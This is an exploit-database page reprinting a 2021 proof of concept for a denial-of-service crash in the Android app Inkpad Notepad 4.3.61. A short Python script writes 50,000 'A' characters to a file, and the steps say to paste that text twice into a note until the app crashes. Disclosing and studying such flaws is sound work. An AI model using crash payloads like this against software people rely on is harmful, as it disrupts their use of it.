Advertisement






Inkpad Notepad And To Do List 4.3.61 Denial Of Service

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Not specified Not specified
Author Risk Exploitation Type Date
Not specified Not specified Remote 2021-06-04
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.04187 0.59966

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060022

Below is a copy:

Inkpad Notepad And To Do List 4.3.61 Denial Of Service
# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
# Date: 2021-06-03
# Author: Brian Rodrguez
# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX
# Version: 4.3.61
# Category: DoS (Android)

##### Vulnerability #####

InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:

# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed

Successful exploitation will cause the application to stop working.

I have been able to test this exploit against Android 8.0.

##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 50000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum